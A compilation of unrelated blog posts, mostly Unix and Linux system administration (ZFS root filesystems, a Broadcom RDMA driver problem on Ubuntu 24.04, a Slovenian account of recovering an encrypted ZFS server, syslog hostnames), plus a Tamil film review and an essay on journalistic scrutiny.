A traditional thing with all of our non-Linux installs is that they don't have mirrored system disks. We've made some stabs at it in the past but at the time we found it complex and not clearly compelling, perhaps partly because we didn't have experience with their software mirroring systems. Well, we have a lot of experience with mirroring ZFS vdevs and it's trivial to set ZFS mirroring up after the fact or to revert back from a mirrored setup to a single-disk setup. So while we might not bother going through the hassles of learning a FreeBSD-specific software mirroring system, we're pretty likely to use ZFS mirroring on any production FreeBSD machines. And that will be a good thing for our FreeBSD machines in general.

(Using ZFS for the root filesystem also eliminates any chance that the server will ever stall in boot asking us to approve a fsck, something that has happened to our OpenBSD machines under rare circumstances.)

I'm also personally pleased to see a fully supported 'root on ZFS' in anything. My impression is that FreeBSD is reasonably well used, so their choice of ZFS for the default root filesystem setup may even be exposing a reasonable number of people to (Open)ZFS and its collection of nice things.

PS: our OpenBSD machines come in pairs and we've had very good luck with their root drives, or we might have looked into the OpenBSD bioctl(8) software mirroring system and how you install to a mirror.

The Broadcom 'bnxt' Ethernet driver and RDMA (in Ubuntu 24.04)

By: cks

We have a number of Supermicro machines with dual 10G-T Broadcom based networking; specifically what they have is the 'BCM57416 NetXtreme-E Dual-Media 10G RDMA Ethernet Controller'. Under Ubuntu 22.04, everything is fine with these cards (or at least seems to be in non-production use), using the normal bnxt_en kernel driver module. Unfortunately this is not our experience in Ubuntu 24.04.

In Ubuntu 24.04, these machines also load an additional Broadcom bnxt driver, bnxt_re, which is the 'Broadcom NetXtreme-C/E RoCE' driver. RoCE is short for RDMA over Converged Ethernet, and to confuse you, this driver is found in the 'Infiniband' area of the Linux kernel drivers tree. Unfortunately, on our hardware the 24.04 bnxt_re doesn't work (or maybe the hardware doesn't work and bnxt_re is failing to detect that, although with 'RDMA' in the name of the hardware one sort of suspects it's supposed to work). The driver stalls during boot and spits out kernel messages like:

bnxt_en 0000:ab:00.0: QPLIB: bnxt_re_is_fw_stalled: FW STALL Detected. cmdq[0xf]=0x3 waited (102721 > 100000) msec active 1
bnxt_en 0000:ab:00.0 bnxt_re0: Failed to modify HW QP
infiniband bnxt_re0: Couldn't change QP1 state to INIT: -110
infiniband bnxt_re0: Couldn't start port
bnxt_en 0000:ab:00.0 bnxt_re0: Failed to destroy HW QP
[... more fun ensues ...]

This causes systemd-udev-settle.service to fail:

udevadm[1212]: Timed out for waiting the udev queue being empty.
systemd[1]: systemd-udev-settle.service: Main process exited, code=exited, status=1/FAILURE

This then causes Ubuntu 24.04's ZFS services to fail to completely start, which is a bad thing on hardware that we want to use for our ZFS fileservers.

We aren't the only people with this problem, so I was able to find various threads on the Internet, for example. These gave me the solution, which is to blacklist the bnxt_re kernel module, but at the time left me with the mystery of how and why the bnxt_re module was even being loaded in the first place.

The answer is that bnxt_re is being loaded through the second sort of kernel driver module loading. It is an 'auxiliary' module for handling RDMA on top of the normal bnxt_en network driver, and the bnxt_en module basically asks for it to be loaded (which also suggests that at least the module thinks the hardware should be able to do RDMA properly). More specifically, bnxt_en basically asks for bnxt_en.rdma to be loaded, and that that is an alias for bnxt_re. Fortunately you don't have to know all of this in order to block bnxt_re from loading.

We don't have any 22.04 installs on this specific hardware any more, so I can't be completely sure what happened under 22.04, but it appears that 22.04 didn't load the bnxt_re module on these servers. Running 'modinfo' on the 22.04 module shows that it doesn't have the bnxt_en.rdma module alias it does in 24.04, so maybe you had to manually load it if your hardware had RDMA and you wanted to use it.

(Looking at kernel source history, it appears that bnxt_re support for using this 'auxiliary driver interface' only appeared in kernel 6.3, which is much too late for Ubuntu 22.04's normal server kernel, which is based on 5.15.0.)

One of my lessons learned from this is that in today's Linux kernel environment, drivers may enable additional functionality that you neither asked for or wanted, just because it's there. We don't use RDMA and never asked for anything related to RoCE, but because the hardware is (theoretically) capable of it, we got it anyway.

Review: 'Maharaja' (2024)

Review: 'Maharaja' (2024)

Spoilers abound; trigger warning: sexual violence

In case you haven't watched the film and don't plan to, you can check out the plot description on Wikipedia.

Maharaja was bad for two reasons.

First, good films don’t lie to their viewers. Maharaja did in two instances. It lied when it led viewers to believe the Selvam/Sabari storyline was contemporaneous to the Maharaja/Lakshmi storyline. Towards the film’s middle it slowly dawns on us that something’s off, followed by the epiphany that the Selvam/Sabari storyline concluded before the Maharaja/Lakshmi storyline began. What was the purpose of this switch? I can’t think of any beyond the film introducing a twist for a twist’s sake, which is disingenuous because it had no other point to it. It's a sign of the film taking its viewership for granted.

It lied the second time it becomes clear Nallasivam was the fourth person in Maharaja's house that day and we realise an ostensibly comical passage of the film has become doubly redundant — until we stop and think: what was the purpose of the film depicting Inspector Varadharajan’s phone calls at night to the various crooks asking them to take the responsibility for pilfering the dustbin?

Varadharajan would have known by then that Nallasivam was the culprit. Even if one of the crooks he phoned had agreed to own up to the crime, Varadharajan’s plan (previously hidden from the audience) to deliver Nallasivam to Maharaja’s house would have imploded. Alternatively, if Varadharajan was only fake-calling the crooks, why did we have to spend time watching their reactions? Maharaja offers this passage as comic relief, yet such relief wasn’t necessary. In fact the film could have done itself a favour by presaging Varadharajan’s plot against Nallasivam instead of blindsiding viewers at the climax.


This review benefited from inputs from and feedback by Srividya Tadepalli.


Second, the sexual violence in the film is gratuitous. It was reminiscent of Visaranai (2015) and parts of Paatal Lok (2020). It was trauma porn. We realise Selvam, Dhana, and Nallasivam grievously injured Jothi before Nallasivam raped her multiple times. Rather than simply and directly establish that the three men perpetrated sexual violence, Maharaja split up each instance of Nallasivam raping the girl into a separate scene. We sit there and watch Nallasivam perform the act of seeking Selvam’s ‘permission’, followed by Selvam’s drawling response, and Nallasivam making excuses for what he’s about to do.

It’s possible Maharaja’s writers presumed they had to lay the groundwork to justify Varadharajan’s and Maharaja’s actions later. And yet they fail when they refuse to admit a rape once is heinous enough and then fail again when they conclude people who commit heinous crimes deserve vigilante justice.

Such justice is an expression of anger, an attempt to deter future crimes with violence. But we should know by now it fails utterly when directed against sexual violence, which erupts most often in intimate settings: when the perpetrator and the survivor are familiar with each other, more broadly when the men think they can get away with it. And most of all vigilante justice fails because it punishes once the (or a rumoured) perpetrator is caught, yet most perpetrators aren’t, which led to the dismal upwelling of voices during #MeToo. The sexual crimes we hear about constitute a small minority of all such crimes out there, which is why the best way to mitigate them has been to improve social justice.

Yet films like Maharaja persist with a vengeful narrative that concludes once the violence is delivered. I fear the only outcome might be more faith in “encounter” killings. Visaranai claimed to be fact-based but the brutality in the film served no greater purpose than to illustrate such things happen. If the film was responding to a fourth estate that had failed to highlight the underlying police impunity and the powerlessness of those at society’s margins to defend themselves, it succeeded — yet it also failed when it didn’t bother to attempt any sort of triumph, of spirit if not of will. That’s why Paatal Lok and in fact Jai Bhim (2021) were better. But Maharaja is cut from Visaranai’s cloth, and worse for being a work of imagination.

In fact, Maharaja has a ‘second’ climax during which we discover Jothi is really Ammu, Selvam’s biological daughter, and whom Maharaja has been raising since his daughter, his wife, and Selvam’s wife were killed in the same accident. There are some clues at the film’s beginning as to these (intra-narrative) facts but they're ambiguous at best and in fact just disingenuous — another lie like the other plot twist.

But further yet: why? So we can watch Selvam have his lightbulb moment when he realises Jothi was Ammu and feel bad about what he did? (This was also the climax of 2023's Iratta.) Or that men should desist from such crimes because they could be harming their own daughters? Or that viewers might be duped into thinking any kind of justice has been done when Jothi shames Selvam with boilerplate lines? Consider it a third failure.

Why having diverse interests is a virtue

Why having diverse interests is a virtue

Paris Marx's recent experience on the Canadaland podcast alerted me to the importance of an oft-misunderstood part of journalism in practice. When Paris Marx and his host Justin Ling were recording the podcast, Marx said something about Israel conducting a genocide in Gaza. After the show was recorded, the publisher of Canadaland, a fellow named Jesse Brown, edited that bit out. When Marx as well as Ling complained, Brown reinstated the comment by having Marx re-record it to attribute that claim to some specific sources. Now, following Marx’s newsletter and Ling’s statement about Brown’s actions, Brown has been saying on Twitter that Marx's initial comment, that many people have been saying Israel is conducting a genocide in Gaza, wasn't specific enough and that it needed to have specific sources.

Different publications have different places where they draw the line on how much they'd like their content to be attributed. And frankly, there’s nothing wrong, unfair or unethical about this. As the commentary and narratives around Israel’s violence in West Asia have alerted us, the facts as we consider them are often not set in stone even when they have very clear definitions. We’re seeing in an obnoxious way (from our perspective) many people disputing the claim that Israel is conducting a genocide and contesting whether Israel's actions can be constituted a genocide is a fact. Depending on the community to and for which you are being a journalist, it becomes okay for some things to be attributed to no one and just generally considered true, and for others not so much.

This is fundamentally because each one of us has a different level of access to all the relevant information as well as because the existence of facts other than those that we can experience through our senses (i.e. empirically) is controlled by some social determinants as well.

This whole Canadaland episode alerted me the people trying to repudiate the allegation that Israel is conducting a genocide — especially many who are journalists by vocation — by purporting to scrutinise the claims they are being presented with. Now, scrutiny in and of itself is a good thing; it's one of the cornerstones of scepticism, especially a reasonable exercise of scepticism. But what they’re scrutinising also matters, and which is a subjective call. I use the word ‘subjective’ with deliberate intent. Scrutiny in journalism is a good thing (I’m treating Canadaland as a journalistic outlet here), yet it’s important to cultivate a good sense of what can and ought to be scrutinised versus a scrutiny of something that only suggests the scrutiniser is being obstinate or intends to waste time.

Many, if not all, journalists would have started off being told it's important to be alert, to be aware of scrutinising all the claims they encounter. Many journalists also cultivate this sense over time, and the process by which they do so allows subjective considerations to seep in — and that is not in and of itself a bad thing. In fact it's good. I have often come across editors who have predicted a particular story's popularity where others only saw a dud based solely on their news sense. This is not a clinical scientific technique, it's by all means a sense. Informing this sense are, among other things, the pulse of the people to whom you're trying to appeal, the things they value, the things they used to value but don’t any more, and so forth. In other words this sense or pulse has an important socio-cultural component to it, and it is within this milieu that scrutiny happens.

Scrutinising something in and of itself is not always a virtue for this reason: in the process of scrutinising something, it’s possible for you to end up appealing to things that people don’t consider virtues or, worse, which they could interpret to mean you’re vouching for something they consider antithetical to their spirit as a people.

This Marx-Ling-Brown incident is illustrative to the extent that it spotlights the many journalists waking up to a barrage of statements, claims, and assertions both on and off the internet that Israel is conducting a genocide in Gaza. These claims are stinging them, cutting at the heart of something they value, something they hold close to their hearts as a community. <>So they're responding by subjecting these claims to some tough scrutiny. Many of us have spent many years applying the same sort of tests to many, many other claims. For example, science journalists had to wade through a lot of bullshit before we could surmount the tide of climate denialism and climate pacifism to get to where we are today.

However, now we're seeing these other people, including journalists, subjecting of all things the claim that Israel is conducting a genocide in Gaza to especial scrutiny. I think they're waking up to the importance of scepticism and scrutiny through this particular news incident. Many of us woke up before, and many of us will wake up in future, through specific incidents that are close to us, that we know more keenly than most others will have a sort of very bad effect on society. These incidents are a sort of catalyst but they are also more than that — a kind of awakening.

You learn how to scrutinise things in journalism school, you understand the theory of it very quickly. It's very simple. But in practice, it's a different beast. They say you need to fact check every claim in a reporter's copy. But over time, what you do is you draw the line somewhere and say, "Beyond this point, I'm not going to fact check this copy because the author is a very good reporter and my experience has been that they don't make any statements or claims that don't stand up to scrutiny beyond a particular level." You develop and accrue these habits of journalism in practice because you have to. There are time constraints and mental bandwidth constraints, so you come up with some shortcuts. This is a good thing, but acknowledging this is also important and valuable rather than sweeping it under the rug and pretending you don't do it.

Fact-checking in science journalism
The Gordon and Betty Moore Foundation has helped produce a report on fact-checking in science journalism, and it is an eye-opening read. It was drafted by Deborah Blum and Brooke Borel; there is a nice summary here. The standout findings for me, as a science editor working with journalists for
Why having diverse interests is a virtueClose ReadVM
Why having diverse interests is a virtue

If you want to be a good journalist, you have to cultivate for yourself the right conduits of awakening — and by "right" I mean those conduits that will awaken you to the pulses of the people and the beats you’re responsible for rather than serve some counterproductive purpose. These conduits should specifically do two things. One: they should awaken you as quickly and with as much clarity as possible to what it means to fact check or scrutinise something. It should teach you the purpose of it, why you do it. It should teach you what good scrutiny looks like and where the line is between scrutiny and nitpicking or pedantry. Two: it should alert you to, or alert others about, your personal sense of right and wrong, good and bad. That's why it's a virtue to cultivate as many conduits as possible, that is to have diverse interests.

When we're interested in many things about the world, about the communities and the societies that we live in, we are over time awakened again and again. We learn how to subject different claims to different levels of scrutiny because that experience empirically teaches us what, when, and how to scrutinise and, importantly, why. Today we’re seeing many of these people wake up and subject the tests that we've administered to climate denialism, the anti-vaccine movement, and various other pseudo-scientific movements to the claim that Israel is conducting a genocide. When we look at them we see stubborn people who won't admit simple details that are staring us in the face. This disparity arises because of how we construct our facts, the virtues to which we would like to appeal, and the position of the line beyond which we say no further attribution is necessary.

Obviously there is no such thing as the view from nowhere, and I'm clear that I'm almost always appealing to the people who are not right-wingers. So from where I'm standing it seems more often than not as if the tests being administered to, say, the anti-vaccine movement are more valid instances of their use than the tests being administered against claims that Israel is conducting a genocide.

Such divisions arise when we don't cultivate ourselves as individuals, when we don't nurture ourselves and the things that we're interested in. Simply, it speaks to the importance of having diverse interests. It's like traveling the world, meeting many people, experiencing many cultures. Such experiences teach us about multiculturalism and why it’s valuable, and they teach us the precise ways in which xenophobia, authoritarianism, and nationalism effect their baleful consequences. In a very similar way, diverse interests are good teachers about the moral landscape we all share and its normative standards that we co-define. They can quickly teach you about how far you stand from where you might really like to be.

In fact, it’s entirely possible for a right-winger to read this post and take away the idea that where they stand is right. As I said, there is no view from nowhere. Right and wrong depend on your vantage point, in most cases at least. I wanted to put these thoughts down because it seemed like people who may not have many interests or who have very limited interests are people also more likely to disengage from social issues earlier than others. Disengagement is the fundamental problem, the root cause. There are many reasons for why it arises in the first place, but getting rid of it is entirely possible, and importantly something we need to do. And a good way to do it is to cultivate many interests, to be interested in many problems, so that over time our experiences navigating those interests inevitably lead to a good sense of what we should and what we needn’t have to scrutinise. It will teach us why some particular points of an argument are ill-founded. And if we're looking for it, it will give us a chance to fix that and even light the way.

Reševanje ZFS

Prejšnji teden sem se odločil posodobiti operacijski sistem Debian na enem izmed svojih strežnikov. Posodobitev je načeloma preprosta - v datoteko sources.list je treba vpisati nova skladišča programskih paketov, nato pa se požene apt-get -y update, apt-get -y upgrade ter apt-get -y full-upgrade (pa še kakšno malenkost). Vse to sem lepo naredil in na koncu je preostal le še ukaz reboot, ki ponovno zažene sistem. Minuta ali dve čakanja - in strežnik bi se moral zbuditi s posodobljenim operacijskim sistemom. Le da se to ni zgodilo. Niti po petih, niti po desetih minutah. Kar je… znak za alarm. Še posebej, če se strežnik nahaja na drugem koncu… Slovenije (ali pa Evrope, saj je vseeno).

PiKVM

No, na srečo je bil na strežnik priključen PiKVM. Gre za napravico, ki omogoča oddaljen dostop in oddaljeno upravljanje računalnikov. PiKVM je v osnovi dodatek (tim. “klobuk” oz. angl. hat), ki ga priklopimo na RaspberryPi. Nato pa PiKVM priključimo na računalnik namesto monitorja in tipkovnice/miške - v tem primeru nam PiKVM predstavlja virtualni monitor, virtualno tipkovnico, miško, CD, USB ključek, itd. Preko tega nato lahko računalnik ali strežnik oddaljeno upravljamo (vstopimo lahko tudi v BIOS, virtualno pritisnemo gumb za izklop ali gumb za reset) - in to kar preko spletnega brskalnika. Programska oprema je popolnoma odprtokodna, zadeva pa podpira tudi priklop na KVM razdelilec, kar nam omogoča oddaljeno upravljanje več računalnikov - to je recimo idealno za montažo v podatkovni center.

PiKVM ob nakupu

PiKVM ob nakupu.

Skratka, ko se strežnik nekaj časa ni več odzival, sem se povezal na PiKVM in šel pogledat kaj se je dejansko zgodilo. In zgodila se je… katastrofa.

Težava

Strežnik je namreč po ponovnem zagonu obstal v initramfs. Aaaaaa! Na dnu zaslona pa se je svetilo še zadnje opozorilo preden je sistem dokončno izdihnil - ALERT! ZFS=rpool/ROOT/debian does not exists. Dropping to a shell!. V obupu sem spregledal tisti “s” in prebral “hell”…

V tistem trenutku sem se spomnil, da je bil na korenskem razdelku strežnika seveda nameščen ZFS datotečni sistem - in to šifriran - ob nadgradnji pa sem seveda pozabil ročno omogočiti tim. jedrne module (angl. kernel modules), ki bi omogočili, da operacijski sistem ob zagonu prepozna ZFS. In da bi bila stvar še hujša - na strežniku je teklo (no, zdaj pač ne več) več virtualnih strežnikov. Ki so bili sedaj seveda vsi nedosegljivi.

Opomba. ZFS (Zettabyte File System) je napreden datotečni sistem, ki je znan po svoji zanesljivosti, razširljivosti, uporabi naprednih tehnik za preverjanje in popravljanje napak (kar zagotavlja, da so podatki vedno dosledni in brez poškodb), uporabi kompresije in deduplikacije, itd. Skratka, idelaen za strežniška okolja.

Dobro, zdaj vemo kaj je problem, ampak kako ga rešiti?

Načrt za njeno rešitev

Da si vsaj malo opomorem od pretresa, sem si najprej pripravil močno kavo. Odločitev se je izkazala za strateško, saj se je reševanje sistema zavleklo pozno v noč (in še v naslednje dopoldne).

Po krajšem razmisleku se mi je v glavi zarisal naslednji načrt. Najprej sistem zaženem iz “Live Debian CD-ja”, na ta začasni sistem namestim podporo za ZFS, priklopim ZFS diskovje, se “chroot-am” v stari sistem, tam popravim nastalo škodo in vse skupaj ponovno zaženem. In to je to!

Na tej točki bi se v kakšnem starem filmu samo še vsedel na konja in odjahal v sončni zahod, ampak kot se je izkazalo, je bila pot do konja (in njegovega sedla)… še precej trnova. Pa pojdimo po vrsti.

PiKVM v akciji

PiKVM v akciji.

Najprej sem na PiKVM prenesel datoteko debian-live-12.6.0-amd64-standard.iso, jo priklopil kot navidezni CD, ter zagnal strežnik. To je bilo resnično enostavno in PiKVM se je ponovno izkazal za vreden svojega denarja.

Se je pa že kar na začetku izkazalo, da strežnik prepoznava samo ameriško tipkovnico. In ker imam jaz slovensko, je bilo treba najprej ugotoviti katero tipko moram pritisniti, da dobim točno tisti poseben znak, ki ga potrebujem. No, tule je nekaj v mojem primeru najpogosteje uporabljenih znakov na slovenski tipkovnici in njihovi “prevodi” na ameriško tipkovnico:

- /
? - 
Ž |
+ =
/ &

Luč na koncu tunela

Naslednji korak je bil, da v /etc/apt/sources.list tim. “živega sistema” dodam še skladišče contrib. Nato pa sem že lahko namestil podporo za ZFS: sudo apt update && sudo apt install linux-headers-amd64 zfsutils-linux zfs-dkms zfs-zed.

Po minuti ali dveh, pa sem že lahko naložil ZFS jedrne module: sudo modprobe zfs. Ukaz zfs version je pokazal, da podpora za ZFS zdaj deluje:

zfs-2.1.11-1
zfs-kmod-2.1.11-1

No, prvi korak je uspel, sedaj pa je bilo v sistem potrebno “samo še” priključiti obstoječe diskovje. Najprej sem naredil ustrezno mapo, kamor bom priklopil diskovje: sudo mkdir /sysroot.

Nato pa sem skušal nanjo priključil svoj “rpool” ZFS. Spodnji ukazi so zgolj približni (verjetno je treba narediti še kaj, recimo nastaviti tim. mountpoint), so pa lahko vodilo komu, ki bo imel podobne težave. Naj seveda dodam, da ni šlo povsem enostavno in je bilo potrebno kar nekaj telovadbe, da sem uspel priti do končnega cilja.

sudo zpool import -N -R /sysroot rpool -f

sudo zpool status
sudo zpool list
sudo zfs get mountpoint

Na tej točki sem vnesel šifrirno geslo: sudo zfs load-key rpool… in preveril, da je ZFS odklenjen: sudo zfs get encryption,keystatus.

Sedaj pa priklop: sudo zfs mount rpool/ROOT/debian. In evo, podatki so bili vidni in kot je kazalo ni bilo nič izgubljenega!

Oživljanje “pacienta”…

Končno je sledil chroot v stari sistem:

sudo mkdir /sysroot/mnt
sudo mkdir /sysroot/mnt/dev
sudo mkdir /sysroot/mnt/proc
sudo mkdir /sysroot/mnt/sys
sudo mkdir /sysroot/mnt/run
sudo mount -t tmpfs tmpfs /sysroot/mnt/run
sudo mkdir /sysroot/mnt/run/lock

sudo mount --make-private --rbind /dev /sysroot/mnt/dev
sudo mount --make-private --rbind /proc /sysroot/mnt/proc
sudo mount --make-private --rbind /sys /sysroot/mnt/sys

sudo chroot /sysroot/mnt /usr/bin/env DISK=$DISK bash --login

Zdaj sem bil torej uspešno povezan v stari (“okvarjeni”) sistem. Najprej je bilo vanj potrebno namestiti ZFS podporo:

apt install --yes dpkg-dev linux-headers-generic linux-image-generic
apt install --yes zfs-initramfs
echo REMAKE_INITRD=yes > /etc/dkms/zfs.conf

…z manjšimi težavami

Seveda se je vmes pojavila še ena napaka, in sicer nameščanje programske opreme ni bilo možno zaradi okvarjenega systemd paketa. To sem rešil z:

sudo rm /var/lib/dpkg/info/systemd*
sudo dpkg --configure -D 777 systemd
sudo apt -f install

Potem so se seveda pojavile še nerešene odvisnosti… kako točno sem to uspel rešiti se niti ne spomnim več, pomagali pa so naslednji ukazi (ne nujno v tem vrstnem redu):

dpkg --force-all --configure -a
apt --fix-broken install
apt-get -f install

Zdaj je bilo potrebno priklopiti še efi razdelek (za katerega je bilo potrebno najprej ugotoviti kje točno se sploh nahaja):

cp -r /boot /tmp
zpool import -a
lsblk
mount /dev/nvme0n1p2 /boot/efi
cd /tmp
cp * /boot/

Zdaj pa zares!

Končno sem lahko pognal ukaze s katerimi sem dodal ZFS jedrne module v jedro operacijskega sistema:

update-initramfs -c -k all
dkms autoinstall
dkms-status
update-grub
grub-install

No, in končno je sledil ponovni zagon sistema, po njem pa je bilo treba popraviti še mesto priklopa ZFS sistema (zfs set mountpoint=/ rpool/ROOT/debian)… še en ponovni zagon - in stari sistem je vstal od mrtvih.

Postfestum sanacija nastale škode

Zaradi silnega čaranja in ne povsem dokončane nadgradnje, je bilo potrebno namestiti manjkajoče programske pakete, ponovno namestiti nekaj systemd paketov in odstraniti stara jedra operacijskega sistema. Vse seveda ročno.

Aja, pa iz nekega razloga je ob posodobitvi izginil SSH strežnik. Ampak to rešiti je bila sedaj mala malica.

Sledil je reboot in nato še enkrat reboot, da vidim, če res vse deluje.

Konec dober, vse dobro

In zdaj deluje. O, kako lepo deluje! ZFS je kriptiran, sistem se po vnosu gesla za odklep lepo zažene, prav tako se samodejno zaženejo virtualni strežniki. PiKVM pa je dobil prav posebno mesto v mojem srcu.

Pa do naslednjič, ali kako že rečejo! :)

P. S. Hvala tudi Juretu za pomoč. Brez njegovih nasvetov bi vse skupaj trajalo precej dlje.

How Linux kernel driver modules for hardware get loaded (I think)

By: cks

Once upon a time, a long time ago, the kernel modules for your hardware got loaded during boot because they were listed explicitly as 'load these modules' in configuration files somewhere. You can still explicitly list modules this way (and you may need to for things like IPMI drivers), but most hardware driver modules aren't loaded like this any more. Instead they get loaded through udev, through what I believe is two mechanisms.

The first mechanism is that as the kernel inventories things like PCIe devices, it generates udev events with 'MODALIAS' set in them in a way that incorporates the PCIe vendor and device/model numbers. At the same time, kernel modules declare all of the PCIe vendor and model values that they support, which are turned into (somewhat wild carded) module aliases that you can inspect with 'modinfo', for example:

$ modinfo bnxt_en
description: Broadcom BCM573xx network driver
license:     GPL
alias:       pci:v000014E4d0000D800sv*sd*bc*sc*i*
alias:       pci:v000014E4d00001809sv*sd*bc*sc*i*
[...]
alias:       pci:v000014E4d000016D8sv*sd*bc*sc*i*
[...]

(The other parts of the pci MODALIAS value are apparently, in order, the subsystem vendor, the subsystem device/model, the base class, the sub class, and the 'programming interface'. See the Arch Wiki entry on modalias.)

As I understand things (and udev rules), when udev processes a kernel udev event with a MODALIAS set, it will attempt to load a kernel module that matches the name. Usually this will be done through wild card matching against aliases, as in the case of Broadcom BCM573xx cards; a supported card will have its PCIe vendor and device listed as an alias, so udev will wind up loading bnxt_en for it.

The second mechanism is through something called the Auxiliary 'bus'. To put my own spin on it, this is a way for core hardware drivers to declare (possibly only under some situations) that loading an additional driver can enable extra functionality. When the main driver loads and registers itself, it will register a pseudo-device on the 'auxiliary bus'. This bus registration generates a udev event with a MODALIAS that starts with 'auxiliary:' and apparently is generally formatted as 'auxiliary:<core driver>.<some-feature>', for example 'auxiliary:bnxt_en.rdma'. When this pseudo-device is registered, the udev event goes out from the kernel, is picked up by udev, and triggers an attempt to load whatever kernel module has declared that name as an alias. For example:

$ modinfo bnxt_re
[...]
description: Broadcom NetXtreme-C/E RoCE Driver
[...]
alias:       auxiliary:bnxt_en.rdma
depends:     ib_uverbs,ib_core,bnxt_en
[...]

(Inside the kernel, the two kernel modules use this pseudo-device on the auxiliary bus to connect with each other.)

As far as I know, the main kernel driver modules don't explicitly publish information on what auxiliary bus things they may trigger; the information exists only in their code. You can attempt to go the other way by looking for modules that declare themselves as auxiliaries for something else. This is most conveniently done by looking for 'auxiliary:' in /lib/modules/<version>/modules.alias.

(Your results may depend on the specific kernel versions and build options involved, and perhaps what additional packages have been added. On my Fedora 40 machine with 6.9.12, there are 37 auxiliary: aliases; on an Ubuntu 24.04 machine with '6.8.0-39', there are 49, with the extras coming from the peci_cputemp and peci_dimmtemp kernel modules.)

PS: PCI(e) devices aren't the only thing that this kernel module alias facility is used for. There are a whole collection of USB modaliases, a bunch of 'i2c' and 'of' ones, a number of 'hid' ones, and so on.

Host names in syslog messages may not be quite what you expect

By: cks

Over on the Fediverse, I said something:

It has been '0' days since I (re)discovered that the claimed hostname in syslog messages can be utter junk, and you may be going to live a fun life if you use it for anything much.

Suppose that on your central syslog server you see a syslog line of the form:

[...] alkyone exim[864974]: no host name found for IP address 115.187.17.119

You might reasonably assume that the host name 'alkyone' comes from the central syslog daemon knowing the host name of the host that sent the syslog message to it. Unfortunately, this is not what actually happens. As covered in places like RFC 5424 section 6.2.4 (or RFC 3164 section 4.1.2 for the nominal 'BSD' syslog format, which seem to not actually be what BSD used), syslog messages carry an embedded hostname in them. This hostname is generated by the machine that originated the message, and the machine can put anything it wants to in there. And generally, your syslog daemon (and the log format it's using) will write this hostname into the logs and otherwise use it if you ask for the message's 'hostname'.

(Rsyslog and probably other syslog daemons can create per-host message files on your central syslog server, which can cause you to want a hostname for each message.)

The intent of this embedded hostname is noble; it's there so you can have syslog relays (which may happen accidentally), where the originating system sends its messages to host A and host A relays them to host B, and B records the hostname as the originating system, not host A. Unfortunately, in practice all sorts of things can go wrong, including a quite fun one.

The first thing that can go wrong is systems that have a different view of their hostname than you do. On Unix systems, the normal syslog hostname traditionally comes from whatever the general host name is set to, which isn't necessarily a fully qualified domain name and doesn't necessarily match what its IP address is (you can change the IP address of a system but forget to update its hostname). Some embedded systems will have an internally set host name instead of trying to deduce it from DNS lookups of whatever IP they have, which can cause them to use syslog hostnames like 'idrac-<asset-tag>' (for the BMC of a Dell server with that particular asset tag).

The most fun case is an interaction with a long-standing syslog feature (that I think is often disabled today):

<host> /bsd: arp: attempt to overwrite entry for [...]
last message repeated 2 times

You'll notice that the second message doesn't say '<host> last message repeated ...'. This is achieved with the extremely brute force method of setting the hostname in the message to 'last'. If your central syslog server then attempts to set up per-host syslog logs, you will wind up with a 'last' host (with extremely uninteresting logs).

Also, if people send not quite random garbage to your syslog server's listening network ports (perhaps because they are a vulnerability scanner or nmap or the like), your syslog daemon and your logs can wind up seeing all sorts of weird junk as the nominal hostname. The syslog message format is deliberately relatively liberal and syslog servers have traditionally been even more liberal about interpreting things that arrived on it, on the sensible grounds that it's usually better to record everything you get just in case.

Sidebar: Hostnames in syslog messages appear to be new-ish

In 4.2 BSD, the syslog daemon was part of the sendmail source code, and sendmail/aux/syslog.c doesn't get the hostname from the message but instead from the IP address it came from. I think this continues right through 4.4 BSD if I'm reading the code right. RFC 3164 dates from 2001, so presumably people augmented the syslog format some time before then.

Interestingly, RFC 3164 specifically says that the host name in the message must not include the domain name. I suspect that even at the time this was widely ignored in practice for good operational reasons.

The uncertain possible futures of Unix graphical desktops

By: cks

Once upon a time, the future of Unix desktops looked fairly straightforward. Everyone ran on X, so the major threat to cross-Unix portability in major desktops was the use of Linux only APIs, which became especially D-Bus and systemd related things. Unix desktops that were less attached to tight integration with the Linux environment would probably stay easily available on FreeBSD, OpenBSD, and so on.

What happened to this nice simple vision was Wayland becoming the future of (Linux) graphics. Linux is the primary target of KDE and especially Gnome, so Wayland being the future on Linux has gotten developers for Gnome to start moving toward a Wayland-only vision. Wayland is unapologetically not cross-platform the way X was, which leaves other Unixes with a problem and creates a number of possible future for Unix desktops.

In one future, other Unixes imitate Linux, implementing enough APIs to run Wayland and the other Linux things that in practice it depends on, and as a result they can probably continue to provide the big Linux-focused desktop environments like Gnome. I believe that FreeBSD is working on this approach, although I don't know if Gnome on Wayland on FreeBSD works yet. This allows the other Unix to mostly look like Linux, desktop-wise. As an additional benefit, it allows the other Unix to also use other, more minimal Wayland compositors (ie, window managers) that people may like, such as Sway (the one everyone mentions).

In another future, other Unixes don't attempt to chase Linux by implementing APIs to get Wayland and Gnome and so on to run, and instead stick with X. As desktops, major toolkits, and applications drop support for X or break working on it through lack of use and lack of caring, these Unixes are likely to increasingly be left with old-fashioned X environments that are a lot more 'window manager' than they are 'desktop'. There are people, me included, who would be more or less happy with this state of affairs (in my case, as long as Firefox and a few other applications keep working). I suspect that this is the path that OpenBSD will stick with, and my guess is that anyone using OpenBSD for their desktop or laptop environment will be happy with this.

An unpleasant variant of this future comes about if Firefox and other applications are aggressive about dropping support for X. This would leave X-only Unixes as a backwater, stuck with (at best) old versions of important tools such as web browsers. There are some people who would still be happy with this, but probably not many.

Broadly, I think there is going to be a split between what you could call the Linux desktop (Wayland based with a major desktop environment such as Gnome, even if it's on FreeBSD instead of Linux), perhaps the Wayland desktop (Wayland based with compositor like Sway instead of a full blown desktop environment), and an increasingly limited Unix desktop that over time will find itself having to move from being a desktop environment to being a window manager environment (as the desktop environments stop working well on X).

PS: One big question about the future of the Unix desktop is how many desktop environments will get good Wayland support and then abandon X. Right now, there are a fair number of desktop environments that have little or no Wayland support and a reasonable user base. The existence and popularity of these environments helps drive demand for continued X support in toolkits and so on. Of course, major Linux distributions may throw X-only desktops overboard someday, regardless of usage.

Seeing and matching pf rules when using tcpdump on OpenBSD's pflog interface

By: cks

Last year I wrote about some special tcpdump filtering options for OpenBSD's pflog interface, including the 'rnr <number>' option for matching and showing only packets blocked by a specific rule. You might want to do this if, for example, you temporarily throw brute force attacker IPs into a table and want to take them out soon after they stop hitting you.

